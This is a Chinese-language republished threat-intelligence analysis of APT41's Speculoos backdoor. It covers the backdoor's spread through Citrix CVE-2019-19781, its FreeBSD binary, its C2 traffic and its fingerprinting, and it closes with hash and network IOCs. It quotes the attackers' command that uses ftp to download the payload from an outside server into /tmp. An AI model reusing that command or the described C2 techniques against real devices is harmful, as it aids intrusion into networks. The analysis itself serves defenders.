APT41 Speculoos后门分析

栏目: IT技术 · 发布时间: 4年前

内容简介:2020年3月25日,FireEye发表了APT41全球攻击活动报告。此攻击活动发生在1月20日至3月11日期间,主要对Citrix,Cisco和Zoho网络设备进行攻击。研究人员根据WildFire和AutoFocus数据获得了针对Citrix设备的攻击样本‘Speculoos’,还确定了北美,南美和欧洲等世界各地多个行业的受害者。Speculoos的基于FreeBSD实现的,共识别出五个样本,所有样本文件大小基本相同,样本集之间存在微小差异。Speculoos利用CVE-2019-19781进行攻击传播

2020年3月25日,FireEye发表了APT41全球攻击活动报告。此攻击活动发生在1月20日至3月11日期间,主要对Citrix,Cisco和Zoho网络设备进行攻击。研究人员根据WildFire和AutoFocus数据获得了针对Citrix设备的攻击样本‘Speculoos’,还确定了北美,南美和欧洲等世界各地多个行业的受害者。

APT41 Speculoos后门分析

Speculoos的基于FreeBSD实现的,共识别出五个样本,所有样本文件大小基本相同,样本集之间存在微小差异。Speculoos利用CVE-2019-19781进行攻击传播,CVE-2019-19781影响Citrix Application Delivery Controller,Citrix Gateway和Citrix SD-WAN WANOP等设备,允许攻击者远程执行任意命令。

攻击细节

攻击者利用CVE-2019-19781远程执行命令:’/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@ 66.42.98[.]220/<filename>’。

第一波攻击始于2020年1月31日晚上,使用的文件名为bsd,影响了美国的多个高等教育机构,美国医疗机构和爱尔兰咨询公司。第二波攻击始于2020年2月24日,使用文件名为un,影响了哥伦比亚高等教育机构,奥地利制造组织,美国高等教育机构以及美国的州政府。

基于BSD系统的恶意软件相对少见,此 工具 和特定Citrix网络设备有关,因此Speculoos很可能是APT41组织专为此攻击活动研发的。

二进制分析

Speculoos后门是使用GCC 4.2.1编译的ELF可执行文件,可在FreeBSD系统上运行。 该负载无法保持持对目标持久控制,因此攻击者会使用额外的组件或其他攻击手段维持控制。 后门执行后将进入循环,该循环调用函数通过443端口与C2域进行通信:

alibaba.zzux[.]com (119.28.139[.]120)

如果无法通信,Speculoos会尝试通过443端口与119.28.139 [.] 20上的备份C2通信。如果连接到任一C2服务器,它将与服务器进行TLS握手。 图1显示了发送到C2服务器的数据包。

APT41 Speculoos后门分析 它请求login.live [.] com作为Server Name Indication(SNI)。

APT41 Speculoos后门分析 成功连接到C2并完成TLS握手后,Speculoos将对目标系统进行指纹识别,并将数据发送回C2服务器。其结构如下表1所示。

APT41 Speculoos后门分析 数据通过TLS通道发送,并且Speculoos会等待服务器的两字节响应。 收到响应后,它将向C2发送一个字节(0xa),并进入循环等待命令。 表2为攻击者可执行命令, 可让攻击者完全控制受害者系统。

APT41 Speculoos后门分析 研究中分析的两个Speculoos样本在功能上相同,两者之间只有八个字节不同,在收集系统信息时‘hostname‘和‘ uname -s ’命令不同导致。uname -s返回内核信息,hostname返回主机系统名称。 下图显示了两个Speculoos样本之间的二进制比较。

APT41 Speculoos后门分析

影响评估

互联网可访问设备允许未经授权的用户远程执行代会带来很大的安全问题,CVE-2019-19781影响了多个面向互联网的设备,攻击者积极利用此漏洞来安装自定义后门。受影响组织大量的网络活动都必须经过这些网络设备,攻击者可以监视或修改整个组织的网络活动。

默认情况下通过这些设备可以直接访问组织系统内部,攻击者无需考虑内部网络横向移动的问题。攻击者可以修改网络流量,注入恶意代码,执行中间人攻击,或将用户重定向到虚假登录页面来收集登录凭证。

IOCs

Speculoos SHA256

99c5dbeb545af3ef1f0f9643449015988c4e02bf8a7164b5d6c86f67e6dc2d28
6943fbb194317d344ca9911b7abb11b684d3dca4c29adcbcff39291822902167
493574e9b1cc618b1a967ba9dabec474bb239777a3d81c11e49e7bb9c71c0c4e
85297097f6dbe8a52974a43016425d4adaa61f3bdb5fcdd186bfda2255d56b3d
c2a88cc3418b488d212b36172b089b0d329fa6e4a094583b757fdd3c5398efe1

Network

119.28.139[.]20
alibaba.zzux[.]com
119.28.139[.]120
66.42.98[.]220
exchange.longmusic[.]com

*参考来源: unit42 ,由Kriston编译,转载请注明来自FreeBuf.COM


以上所述就是小编给大家介绍的《APT41 Speculoos后门分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Python深度学习

Python深度学习

[美] 弗朗索瓦•肖莱 / 张亮 / 人民邮电出版社 / 2018-8 / 119.00元

本书由Keras之父、现任Google人工智能研究员的弗朗索瓦•肖莱(François Chollet)执笔,详尽介绍了用Python和Keras进行深度学习的探索实践,涉及计算机视觉、自然语言处理、生成式模型等应用。书中包含30多个代码示例,步骤讲解详细透彻。由于本书立足于人工智能的可达性和大众化,读者无须具备机器学习相关背景知识即可展开阅读。在学习完本书后,读者将具备搭建自己的深度学习环境、建......一起来看看 《Python深度学习》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具